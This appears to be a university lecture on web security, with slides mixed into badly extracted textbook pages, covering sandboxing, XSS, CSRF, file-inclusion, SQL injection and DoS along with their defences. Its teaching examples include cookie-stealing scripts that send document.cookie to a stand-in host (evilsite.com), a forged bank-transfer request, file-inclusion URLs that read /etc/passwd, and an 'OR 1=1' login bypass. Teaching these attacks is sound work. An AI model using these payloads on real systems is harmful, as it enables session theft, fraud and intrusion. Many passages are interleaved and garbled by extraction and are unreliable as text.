CSE 477: Introduction to

Computer Security
Lecture – 20: Web Security - 2

Course Teacher: Dr. Md Sadek Ferdous

Assistant Professor, CSE, SUST
E-mail: ripul.bd@gmail.com
Outline
• Attacks on Web Protocol
• Mitigations Techniques
 malicious actions that might be attempted by the media content players and
interactive tools that should otherwise be providing a safe and enjoyable
user experience.

Sandboxing
The Sandbox
Before continuing the discussion of such attacks on clients, it is helpful to
introduce the idea of the sandbox. A sandbox refers to the restricted privi-
leges of an application or script that is running inside another application.
For example, a sandbox may allow access only to certain files and devices.
These limitations are collectively known as a sandbox. (See Figure 15.)

• A sandbox refers to the restricted

privileges of an application or script that The Main Application

is running inside another application The Sandbox

Actions allowed

• For example, a sandbox may allow access by the application:

read
only to certain files and devices Actions allowed
in the sandbox:
write
execute
all user files

read-only only public display any content

user files
embedded
b dd d
display content only

Figure 15: Actions restricted to a sandbox.

© Alegria/Shutterstock

Javascript has a carefully delineated set of elements that it is allowed

to access when run inside a web browser, including the DOM hierarchy
of a web site. Javascript has no ability to execute code on a user’s machine
outside of the browser, however, or to affect web sites open in other browser
windows.
Sandboxing
• Developers are often striving to create new ways of isolating code
execution to reduce the impact of malicious behaviour
• For example, Google’s Chrome browser runs each new tab as a new
process, effectively sandboxing each tab at the operating system level
• This tactic mitigates the risk of vulnerabilities allowing browser tabs to
access the contents of other tabs by creating a sandbox beneath the
application layer
Adobe Flash
• Online media content can be another vector for attack
• Increasingly, audio and video are embedded into web sites
• If an embedded media player used by a web browser to play this content has
application-level flaws, malicious media files may be created to escape the sandbox
of the victim’s browser and execute code on the victim’s machine
• This has been a recurring problem for streaming media technologies
• One particularly popular media format is Adobe Flash (formerly known as Macromedia Flash,
then Shockwave Flash)
• This technology is nearly ubiquitous, and is frequently used to create advertisements
or other interactive web content
• Like all media content requiring a separate player, however, Flash presents potentials
for security vulnerabilities in exploiting application flaws in the Flash media player
• Thus, one should always be using the latest version of this player, which will include
patches to previously discovered vulnerabilities
Mobile code
• What is mobile code?
• Executable program
• Sent via a computer network
• Executed at the destination
• Examples
• JavaScript
• ActiveX
• Java Plugins
• Integrated Java Virtual Machines
ActiveX vs Java
• Windows-only technology runs in
Internet Explorer
• Binary code executed on behalf of
browser
• Can access user files outside the
sandbox
• Support for signed code
• IE configuration options – Allow,
deny, prompt – Administrator
approval
• Via Java Applet
• Platform-independent via
browser plugin
• Java code running within browser
• Sandboxed execution
• Support for signed code
• Applet runs only on site where it
is embedded
• Applets deemed trusted by user
can escape sandbox
ActiveX
• This signed ActiveX control ask
the user for permission to run
• If approved, the control will run
with the same privileges as the
user
• The “Always trust content from
…” checkbox automatically
accepts controls by the same
publisher
• Probably a bad idea
ActiveX
• Trusted publishers
• List stored in the Windows registry
• Malicious ActiveX controls can modify the registry table to make their publisher
trusted
• All future controls by that publisher run without prompting user
• Unsigned controls
• The prompt states that the control is unsigned and gives an accept/reject option
• Even if you reject the control, it has already been downloaded to a temporary
folder where it remains
• It is not executed if rejected, but not removed either
Cross-Site Scripting (XSS) attack
• One of the most common web security vulnerabilities today is from
cross- site scripting (XSS) attacks Web Security

• These are attacks where improper input validation on a web site allows
In this case, the guestbook is known as an attack vector—it’s the means
by which a malicious user can inject code. The specifics of that injected
malicious users code
to inject code into the web site
are known as the payload. In this case, the payload was a relatively
harmless (if annoying) pop-up box, but it is possible to construct much
• which later is executed in a visitor’s browser
more dangerous payloads. (See Figure 16.)

Attacker

Malicious XSS Vulnerable

Script Code Website

Victim
Persistent XSS
• In a persistent XSS attack, the code that the attacker injects into the web
site remains on the site for a period of time and is visible to other users
• A classic example of persistent XSS is exploiting a web site’s guestbook or
message board
• Consider a web site, such as a news web site or social networking site,
that incorporates a guestbook allowing visitors to enter comments and
post them for other visitors to see
• If the user input to be stored in the guestbook is not properly sanitised
to strip certain characters, it may be possible for an attacker to inject
malicious code that is executed when other users visit the site
 message board. </html>
Consider a web site, such as a news web site or social networking site,
thatAttacker
incorporates a guestbook allowing visitors to enter
Code Fragment The guestbook
7: comments and page incorporating comments from visi-
post them for other visitors to see. If thetors. user input to be stored in the

Persistent XSS
guestbook is not properly sanitized to strip certain characters, it may be
Take, for instance, the snippet of Javascript code in Code Fragment 8.
possible for an attacker to inject malicious
Malicious code that is executed when other
XSS Vulnerable
users visit the site.Script
First,
Codethe user might be presented with the form from
Website
Code Fragment 6. <script> Web Security
alert("XSS injection!");
Victim </script>
<html> <html>
<title>Sign My Guestbook!</title> Code Fragment 8: Javascript code that might be used
<title to test
>My XSS injection.
Guestbook </title>
<body>
<body>
Sign my guestbook! This Javascript code simply creates a pop-up
Figure 16: In an XSS attack, the attacker uses the web site as a vector to
Web Securitymethod="POST"> Yourmessage
commentsboxare
withgreatly
the textappreciated!<br />
< form action="sign.php"
execute malicious code in a victim’s browser. XSS injection! when the code is executed.Here If the sign.php script on the
<input type="text" name="name"> server simply copies whatever the user types in the is what everyone said:<br />
parameter
Javascript hassteal.php
for<the abilitypage,
thetype="text"
input which
to redirect presumably
visitors
name="message" records
to arbitrary the cookies.
pages,
size="40" so>this is Joe: Hi! <POST
br /> form into the
The
oneattacker could contents aof the guestbook, the result wouldJohn:be the codehowshown
are in Code
possible< inputthen
avenue foruse the Malicious
attack.
type="submit" cookies tousers
impersonate the
> victim
could simply
value="Submit" inject at the
short Hello, you? <br />
target
scriptsite
thatinredirects
a sessionallhijacking
viewers attack.
to a newNevertheless, thisFragment
page that attempts technique 9.
is
to download aIf anyone visited the page containing the attacker’s comment,
Jane: How does the guestbook work? <br />
</form>
bit crude,orbecause
viruses a user would
other malware most
to their likely notice
systems. Combinedif their browser
with was
Javascript’s
this excerpt would be executed as code and the user
</body > </body > would get a pop-up
redirected
ability to to an unexpected
access and manipulatepage. There
cookies,arehowever,
several techniques
this attackan canattacker
become
< /html > the execution message box. </html>
could
even use
more to dangerous.
hide of this an
For example, code. Two of
attacker the most
could injectpopular
the scriptareof
embedding an image
Code Fragment request
10 into to the malicious URL and using an invisible
a guestbook.
CodeHTML
iframe—an Fragment
element A page
6: which that
makes allowstousers
it possible embedtoa web
<html
post
> page
comments to a guest- Code Fragment 7: The guestbook page incorporating comment
inside book.
another.
<script > <title>My Guestbook</title> tors.
document.location
Code Fragment 11 = shows
"http://www.evilsite.com/
a use of Javascript to create an < bodywhich
image, >
On entering a comment,
steal.php?cookie="+document.cookie; this page will submit
then sets the source of that image to the attacker’s site, again Your the
passing user’s input
the
comments as POST
are greatly appreciated!<br Take,
/> for instance, the snippet of Javascript code in Code Fra
</script>
cookie variables to the When
as a GET variable. page thesign.php. This page
page is rendered, the presumably
victim’s
Here uses everyone
browser
is what server-side code
said: <br />
makes (which
a requestwill
to be
this discussed
URL for the later
image, in this
passing chapter),
the cookie to
to insert
the
Evilguy:
Code Fragment 10: A Javascript function that could be used to steal a user’s the
user
< user’s
script > input
alert("XSS into
Injection!"); </script> <br />
without displaying any results (since no image is
the guestbook page, which might look something
cookie. returned). Joe: Hi! br />shown in Code
like<that < script >
Fragment 7. Javascript’s ability to access the DOM John: Hello, how are you? <br /> alert("XSS injection!");
<script >
This code uses to redirect a
img = new Image(); Jane: How does the guestbook work? <<br/script
/> >
visitor to the attacker’s site, www.evilsite.com, and concatenates the user’s
img.src = "http://www.evilsite.com/steal.php?cookie=" </body>
cookies (accessed by the DOM object document.cookie) to the URL as a GET
+ document.cookie; </html> Code Fragment 8: Javascript code that might be used to test XSS
</script>
Code Fragment 9: The resulting guestbook page, with the Javascript above
Code Fragment 11: Using an image for XSS. This Javascript code simply creates a pop-up message box w
injected via XSS.
 Web Security

and displayed in a web page at a later time, at which point the scrip
Non-persistent XSS execute in the user’s browser.

• In contrast to the previous example of a guestbook, most real-life

Nonpersistent
examples of cross-site scriptingXSSdo not allow the injected code to persist
past the attacker’s session
In contrast to the previous example of a guestbook, where the in
• There are manyJavascript
examples of howonthese
remains non-persistent
the page XSS
for viewers to see, most real-life exam
vulnerabilities can be exploited
of cross-site scripting do not allow the injected code to persist pa
attacker’s
• A classic example session. There
of non-persistent XSSare
is amany examples
search of how
page that thesethe
echoes nonpers
search query XSS vulnerabilities can be exploited, however.
A classic example of nonpersistent XSS is a search page that echo
• For example, on typing
search “security
query. book” into
For example, a search
on typing box on
“security a web
book” intosite,
a search b
the results page might
a web begin
site, with apage
the results linemight
reading
begin with a line reading
Search results for security book.
 At Iffirst
the glance, this is
user’s input vulnerability
not sanitizedmay not seem
for certain all that injecting
characters, significant—
segments
after all, an attacker
of code into theseems
searchtobox
only have
could the ability
result to inject codepage
in the search-results to a page
including
that is that
onlycode
viewable by the
as content onattacker.
the page,Nevertheless,
where it would consider
then be a executed
search page
as code
Non-persistent XSS
where in thethe
search query
client’s is passed as a GET parameter to a search script, as
browser.
represented At by theglance,
first followingthisURL:
vulnerability may not seem all that significant—
• If theafter
user’s
all, input is notseems
an attacker sanitised forhave
to only certain
the characters, injecting
ability to inject code to a page
http://victimsite.com/search.php?query=searchstring
segments
that is of
onlycode into the
viewable by search box could
the attacker. result inconsider
Nevertheless, the search-results
a search page
pagewhere
including that code
the search queryasiscontent
passed asona the
GETpage, where
parameter to ita would then be
search script, as
An attacker could construct a malicious URL that includes their chosen
represented
executed as code byinthe following
the client’s URL:
browser
Javascript payload, knowing that whenever someone navigated to the URL,
their payload would be executed in the victim’s browser. For example, the
http://victimsite.com/search.php?query=searchstring
following URL might be used to accomplish the same cookie-stealing attack
as the previous persistent
An attacker could example:
construct a malicious URL that includes their chosen
Javascript payload, knowing that whenever someone navigated to the URL,
http://victimsite.com/search.php?query=
their payload would be executed in the victim’s browser. For example, the
script>document.location=‘http://evilsite.com/steal.php?cookie=’
<following URL might be used to accomplish the same cookie-stealing attack
+document.cookie </scriptexample:
as the previous persistent >
XSS defences
• Proxy-based:
• Analyse HTTP traffic between browser and web server
• Look for special HTML characters
• Encode them before executing the page on the user’s web browser (i.e. NoScript
- Firefox plugin)
• Application-level firewall:
• Analyse HTML pages for hyperlinks that might lead to leakage of sensitive
information
• Stop bad requests using a set of connection rules
 Web Security

Cross-site Request Forgery (CSRF) 2.7 Cross-Site Request Forgery (CSRF)

Another common type of web site vulnerability is known as cross-site
quest forgery (CSRF). CSRF is essentially the opposite of cross-site script
While XSS exploits a user’s trust of a specific web site, CSRF exploits a w

• Another common type of web site site’s trust of a specific user. In a CSRF attack, a malicious web site cau
a user to unknowingly execute commands on a third-party site that tru

vulnerability is known as Cross-Site Request that user, as depicted in Figure 17.

Forgery (CSRF) Victim

• CSRF is essentially the opposite of cross-site Legitimate

Request

scripting
Evil
• While XSS exploits a user’s trust of a specific Website
Malicious
Request

web site, CSRF exploits a web site’s trust of a

CSRF
Vulnerable

specific user Website

• In a CSRF attack, a malicious web site causes

a user to unknowingly execute commands onvulnerableInsitea onCSRFbehalfattack, a malicious web site executes a request t
Figure 17:
of a trusted user of that site.
a third-party site that trusts that user Suppose an innocent user handles his banking online
www.naivebank.com. This user may stumble upon a site, www.evilsite.c
that contains the lines of malicious Javascript code in Code Fragment 14

<script>
CSRF Figure 17: In a CSRF attack, a malicious web site executes a request to a
vulnerable site on behalf of a trusted user of that site.
• Suppose an innocent user handles his banking online
Suppose an innocent user handles his banking online at
at
www.naivebank.com
www.naivebank.com. This user may stumble upon a site, www.evilsite.com,
• This user
thatmay stumble
contains upon
the lines a site, www.evilsite.com,
of malicious that
Javascript code in Code contains
Fragment 14. the
lines of malicious JavaScript code
<script>
document.location="http://www.naivebank.com/
transferFunds.php?amount=10000&fromID=1234&toID=5678";
</script>

• If the user is alreadyCode

authenticated,
Fragment 14: Code that exploits CSRF.
• the victim’s browser would redirect to the victim’s bank
• specifically, to a pagethis
On reaching thatline
attempts to the
of code, transfer $10,000
victim’s fromwould
browser the victim’s
redirectaccount
to
(#1234)
the to the attacker’s
victim’s account (#5678)
bank—specifically, to a page that attempts to transfer $10,000
from the victim’s account (#1234) to the attacker’s account (#5678). This
attack would be successful if the victim was previously authenticated to the
CSRF
• More recently, a new type of CSRF attack has emerged, commonly known as a
login attack
• In this variant, a malicious web site issues cross-site requests on behalf of the
user, but instead of authenticating to the victim site as the user, the requests
authenticate the user as the attacker
• For example, consider the case of a malicious merchant who allows customers
to purchase using PayPal
• After a visitor logs into their PayPal account to complete a payment, the
merchant could silently issue a forged cross-site request that reauthenticates
the user by logging them in as the attacker
• Finally, the user, unaware that they are logged in as the attacker, might input
credit card information that the attacker could later access by checking his
account
CSRF defences
• Very difficult to prevent, as to the websites, the request looks legitimate
• Without a persistent cookie, use a session token and pass it with every
request
• The attacker needs to get hold of this session token to launch the attack
• However, different session tokens must be used for every session
• Also, don’t forget to log out after every session!
Client side attack defences
• Mitigation of these attacks by the user can be facilitated with two
primary methods:
• Safe-browsing practices
• Built-in browser security measures
Safe-browsing practices
• Links to unknown sites, either contained in email or in the body of an
untrusted web site, should not be clicked on
• In addition, whenever entering personal information to a web site, a user
should always confirm that HTTPS is being used by looking for an indication in
the browser, such as a padlock in the status bar or colour coding in the
address bar
• Most financial sites will use HTTPS for login pages, but if not, the user should
manually add the “s” or find a version of the login page that does use HTTPS
• In addition, the legitimacy of the site should be confirmed by examining the
URL and ensuring that there are no certificate errors
• And, of course, users should never provide sensitive information to an
unknown or untrusted web site
Built-in browser security measures
• Users should also be aware of a number of browser features that are designed
to prevent certain types of attacks
• Most importantly, each browser allows the customisation of settings that
allow fine-grained control over how different features are allowed to run
• Internet Explorer introduces the notion of zones
• By default, web sites are placed in the Internet Zone
• Users can then delegate sites to Trusted and Restricted zones
• Each zone has its own set of security policies, allowing the user to have fine-grained
control depending on whether or not they trust a particular web site
• In contrast, Firefox does not utilise security zones, but applies its rules to all
visited sites
• Many plugins allow further division of security policies into trusted and
untrusted zones
 depending on whether or not they trust a particular web site. In contrast,
Firefox does not utilize security zones, but applies its rules to all visited
sites. Many plugins allow further division of security policies into trusted

Built-in browser security measures

and untrusted zones, however. Opera takes the approach of defaulting to
global security settings, but allowing the user to apply specific policies to
individual sites.
Built-in browser security measures
• Most browsers also feature automatic notifications if a user visits a web
site that is on a public blacklist of known phishing or malware-
distributing sites
• Browser plugins, such as NoScript, use similar white list and blacklist
mechanisms, and can attempt to detect XSS attacks and prevent cookie
theft by sanitising HTTP requests and scanning the source code of a web
site before execution
• Thus, users should take advantage of the built-in browser security
measures and make sure they are running the most up-to-date version
of their browser, so that it has all the latest security updates
 server-side scripting languages allow servers to perform actions such as
accessing databases and modifying the content of a site based on user input
or personal browser settings. They can also provide a common look and feel
Server-side attacks
to a web site by using scripts that generate a common banner and toolbar
on all the pages of a web site. (See Figure 19.)

1. Client requests a dynamic

page, possibly providing user-
specific inputs

Web Server
Client
Scripting Module
2. Server passes user
input and scripted
HTML to Scripting
Module

3. Scripting Module
4. Server returns to user performs script, possibly
dynamic content in a accessing other servers and/or
customized HTML file d t b
databases, and
d returns
t HTML

Figure 19: Actions performed by a web server to produce dynamic content

 it through a PHP processing module in the web server software to create
This variable, number, would most likely be provided through a st
an output HTML file that is sent to a user. The code sample shown in Code
dard HTML form, as in our previous example. The “<?php” and “?
Fragment 15 is an example of a PHP script that dynamically generates a
Server-side scripting
tags denote the start and end of the script. The echo command outp
page based on a GET variable called “number.”
results to the screen. The array that stores all of the provided GET varia
is referred to as “$ GET”—in this case, we are accessing the one nam
<html>
number. Finally, note that variables $x and $y are used without a previo
<body>
<p>Yourtype declaration.
number was <?phpTheir type (integer)
echo $x=$ is decided
GET[’number’];? >.</pby
> the PHP processor
<p>The runtime,
square of when the script
your number is executed.
is <?php $y = $x * The execution
$x; echo $y; ?>of this
.</p > code is co
</body> pletely invisible to the user, who only receives its output. If the user h
</html> previously entered “5” as input to the GET variable, number, the respo
would be as shown in Code Submit via HTML16.
Fragment form
Code Fragment 15: A simple PHP page.

This variable,
<htmlnumber,
> would most likely be provided through a stan-
dard HTML form, <bodyas> in our previous example. The “<?php” and “?>”
tags denote the <start and number
p>Your end of the 5.</p>The echo command outputs
wasscript.
<p>The
results to the screen. The square of your
array that storesnumber is 25.
all of the </p> GET variable
provided
is referred to <as/body
“$ GET”—in
> this case, we are accessing the one named
</html
number. Finally, > that variables $x and $y are used without a previous
note
Server-side scripting inclusion attack
• In a server-side script inclusion attack, a web security vulnerability at a
web server is exploited to allow an attacker to inject arbitrary scripting
code into the server
• which then executes this code to perform an action desired by the attacker
• Two types:
• RFI (Remote-File Inclusion):
• Enables an attacker to execute a remote script in another server
• LFI (Local-File Inclusion):
• Enables an attacker to execute a local malicious script in the same server
argument
filesinto thethan
other current
thePHP argument
onepage,
that into the
executing
is currentlyanycurrent PHP
run.page,
PHP script
being For executing
example,any
contained PHP
one script contained
may
in it. Consider index.php page in it. Consider index.php page
theFragment shown“.”
in Code Fragment 17, where “.”
want to theinclude a common shown
headerin Code
and footer to 17,
all where
pages
denotes concatenation of two strings.
of a website. In
denotes concatenation of two strings.
addition, it may be useful to load different files based on user input. PHP
RFI <?php
<?phpprovides the include function, which incorporates the file specified by the
include("header.html");
argument into the current include($
include("header.html"); PHP page, executing any PHP script contained
GET[’page’].".php");
include($ GET[’page’].".php");
in it. Consider the index.php page shown in Code Fragment 17, where “.”
include("footer.html");
include("footer.html");
?> denotes concatenation of ?two
>
strings.
Code Fragment 17: A PHP page that uses file inclusion to incorporate an
<?php 17: A PHP page that
Code Fragment HTMLuses file inclusion
header, an HTMLto incorporate
footer, an
and a user-specified page.
User submits: Server executes:
include("header.html");
HTML header, an HTML footer, and a user-specified page.
include($ GET[’page’].".php"); Navigating to victim.com/index.php?page=news in this case would re-
vicitim.com/index.php?page=news.php
Navigating sult in the web serverinloading
to victim.com/index.php?page=news
include("footer.html"); andwould
this case re- page news.php using the PHP
executing
> web server loading and processor,
sult in?the executingwhich presumablyusing
page news.php generates the news page and displays it for
the PHP
the user.
processor, which presumably generates theHowever,
news pagean attacker might it
and displays navigate
for to a page specified by the
the user. However, an attacker following
might URL:to a page specified by the
navigate
Code Fragment
Attacker 17: A PHP
submits page that uses file inclusion to incorporate an
following
HTML URL:
header, an HTML footer, and a user-specified page. Server executes
http://victim.com/index.php?page=http://evilsite.com/evilcode
This would result in the web server at victim.com
http://victim.com/index.php?page=http://evilsite.com/evilcode executing the code at
http://evilsite.com/evilcode.php
evilsite.com/evilcode.php locally. Such an attack is known as a remote-file
This would Navigating
result in the victim.com/index.php?page=news
to web server at victim.com executing theincode thisatcase would re-
inclusion (RFI) attack. An example of code an attacker might execute in
evilsite.com/evilcode.php
sult in the web server locally. Such
loading
such anan
andattack is is
executing
attack known
a web page
shell, anews.php
aswhich
remote-file
is a remoteusing the PHP
command station that allows
inclusion
• An (RFI)
processor, attack.
examplewhich An example
of codepresumably
an attacker of code
might an
generates
an attacker attacker
toexecute theinto
navigate might
such
news anexecute
page
the web attack in
isdisplays
andand
server a possibly
web shellit foredit, upload,
view,
such an •attack is a web
whichHowever, shell,
is a remoteanwhich is
command a remote
or deletestation command
files onthat station
allows that
anthis allows
the user. attacker might web sites that
navigate to aattacker
page to navigate
web server bytothe
is hosting.
specified the web server and possibly view,
an attacker to navigate to the web server and
Fortunately, possibly view, edit, upload,
remote-file inclusion attacks are becoming less common,
edit, upload,
following URL: or delete files on web sites
or delete files on web sites that thisbecauseweb server
most is PHPhosting.
• Fortunately, remote-file inclusion attacks areinstallations
becoming less now default to disallowing the server to
common
http://victim.com/index.php?page=http://evilsite.com/evilcode
Fortunately, remote-file inclusion attacks
execute codeare becoming
hosted less common,
on a separate server. Nevertheless, this does not pre-
• because most PHP installations disallows the server to execute code hosted on a separate server by default
becauseThismost PHP installations
would result in the now web default
server to disallowing
at victim.com the executing
server to the code at
execute code hosted on a separate server. Nevertheless, this does not pre-
 a malicious purpose). The difference in an LFI attack, however, is that the
As in ancode
executed RFIisattack, a local-file
not contained server, (LFI)
inclusion
on a remote but on attack
the victimcauses
servera server to
http://victim.com/index.php?page=admin/secretpage
execute
itself. Thisinjected
locality code it would
may allow not have
an attacker accessotherwise performedby
to private information (usually for
ameans
malicious purpose).
of bypassing The difference
authentication in an For
mechanisms. LFIexample,
The URL above might cause the index page to execute the previously
attack, an however,
attacker is that the
executed
itself. LFI
might navigate to
protected code
This
isthe
locality
notfollowing
secretpage.php. contained
may
URL:on a LFI
Sometimes,
allowsystem,
remote
an attacker
accesshttp://victim.com/index.php?page=admin/secretpage
files on the web server’s outside
server,
attacks
access
but on
can allow
of thetoroot
anthe
private
victim
attacker
web information
to server
directory. by
means of bypassing
For example, many Linux authentication
systems keepmechanisms. For example,
a file at /etc/passwd that stores an attacker
local
mightThenavigate
authentication
URL above to might
the following
information. cause the URL:
In the example
index page above, note that
to execute attempting to
the previously
access
protectedthissecretpage.php. Attacker
file by navigating tosubmits
the following
Sometimes, LFI attacksURLcanwill
allownotanwork:
attacker to Server executes:
accesshttp://victim.com/index.php?page=admin/secretpage
files on the web server’s system, outside of the root web directory. vicitim.com/index.php?page=admin/secretpage.php
http://victim.com/index.php?page=/etc/passwd
For example, many Linux systems keep a file at /etc/passwd that stores local Authentication bypassed
authentication information. In the example above, note that attempting to
Thethis URL by above might tocause the index page towork:
execute the previously
access
Becausefile theAttacker
navigating
code submits
concatenatesthe following
.php to any URL willbefore
input not trying to include
protected secretpage.php. Sometimes, LFI attacks can allow doesServer
an executes
attacker to
the code, the web server will try to execute /etc/passwd.php, which not
access files on thethis,web server’s system,
exist. http://victim.com/index.php?page=/etc/passwd
To bypass an attacker could include outside
what isof the root
known as webbyte,
directory.
http://victim.com/index.php?page=/etc/passwd.php
a null
For example,
which many Linux
can be encoded as %00 systems
in a URL. keep
Theanull at /etc/passwd
filebyte denotes the end thatofstores
the local
Because the codetheconcatenates .php to any remove
input before
the trying to include Not found!
authentication
string, allowing information.
attacker toIn the example
effectively above, noteconcatenation.
.php that attempting to
the code, the web server will try to execute /etc/passwd.php, which does not
In this case,
access this theAttacker
file following
by URL could
submits
navigating to the be accessed:URL will not work:
following
exist. To bypass this, an attacker could include what is known as a null byte, Server executes
which can be encoded as %00 in a URL. The null byte denotes the end of the
http://victim.com/index.php?page=/etc/passwd%00
allowing the attacker to effectively remove the .php concatenation. http://victim.com/index.php?page=/etc/passwd
string,http://victim.com/index.php?page=/etc/passwd
In this case, the following URL could be accessed: Bingo!!
This
%00 form
->theof attack
null ->may
the seem
byteconcatenates end ofrelatively
string, benign
ignore when limited
anything after it!totoin-include
Because
formation code .php to any input before
disclosure, but the advent of user-provided content suggests trying
http://victim.com/index.php?page=/etc/passwd%00
the code, the
another method webofserver
attack will
using trythis
to execute /etc/passwd.php,
technique. For example, awhichweb site does not
exist.isTo
thatThis bypass
vulnerable
form this, an attacker
to local-file
of attack may could
inclusion
seem include
might
relatively alsowhat
benign have ais
when known
means
limited as
tofor a null byte,
in-users
which
to upload
formationcandisclosure,
be encoded
images. If but
the %00
asthe
image in a URL.
uploading
advent The
form null byte
does
of user-provided notdenotes
carefully
content the
suggests end of the
check
what
another
string, is allowing
being
method uploaded,
oftheattack this
using
attacker mayto provide
this an attacker
technique.
effectively anthe
avenue
For example,
remove a web
.php toconcatenation.
upload
site
that
In is vulnerable
malicious
this case,code tothe
local-file
thetofollowing inclusion
serverURL(that could
wouldmight
not
be also have a means
ordinarily
accessed: for users and
be executed),
 Since databases often contain confidential information, they are fre-
quently the target of attacks. Attackers could, for example, be interested
in accessing private information or modifying information in a database for
financial gain. Because of the sensitivity of information stored in a database,

Database and SQL injection attack

it is generally unwise to allow unknown users to interact directly with a
database. Thus, most web-based database interaction is carried out on the
server side, invisible to the user, so that the interactions between users and
the database can be carefully controlled, as depicted in Figure 20. The goal
of an attacker, of course, is to breach this controlled database interaction to
get direct access to a database.

• Many web applications take user Legitimate Client

Web Server
Protected,,
controlled
access

input from a form a abase

Database

• Often this user input is used

literally in the construction of a SQL
query submitted to a database Desires direct
unprotected access
• For example: SELECT user FROM table to the database

WHERE name = ‘user_input’; Attacker

• An SQL injection attack involves Figure 20: A model for user interactions with a web server that uses a
database. All database queries are performed via the web server, and direct

placing SQL statements in the user

access to the database by the user is prohibited. The attacker wants to break
through these protections to use the web server to gain direct access to the
database.
input
SQL injection attack
• SQL lets you access and manage (Query) databases
• A database is a large collection of data organised in tables for rapid
search and retrieval, with fields and columns
SQL injection attack

• SELECT statement is used to select data FROM one or more tables in a

database
• Result-set is stored in a result table
• WHERE clause is used to filter records
SQL injection attack
• Standard query to authenticate users:
• select * from users where user='$usern' AND pwd='$password’
• Classic SQL injection attacks
• Server side code sets variables $username and $passwd from user input to web
form
• Variables passed to SQL query
• select * from users where user='$username' AND pwd='$passwd’
• Special strings can be entered by attacker
• select * from users where user='M' OR '1=1' AND pwd='M' OR '1=1’
• Result: access obtained without password!
SQL injection attack solution
• SQL injection vulnerabilities are the result of programmers failing to
sanitise user input before using that input to construct database queries
• Prevention of this problem is relatively straightforward
• Most languages have built-in functions that strip input of dangerous
characters
• For example, PHP provides function mysql real escape string to escape
special characters (including single and double quotes) so that the
resulting string is safe to be used in a MySQL query
• Techniques have also been developed for the automatic detection of
SQL injection vulnerabilities in legacy code
 important web site can also serve as protection. DNS supports the ability to
have multiple IP addresses for the same domain name, so this replication of
web servers can be transparent to users. In this case, redundancy can make
DoS’ing web servers
a web site more resilient against DDOS attacks by making it more difficult
for an attack to disable all the different web servers that are hosting that
web site. (See Figure 21.)
Single Web Server Multiple Servers
for example.com for example.com

(a) (b)

Figure 21: How replication helps against DDOS web attacks: (a) A single
web server for a web site, which is quite vulnerable to DDOS web attacks.
(b) Multiple web servers for the same web site, which are more resilient.
https://pics.me.me/peace-love-and-bazinga-memegen-it-peace-love-52785009.png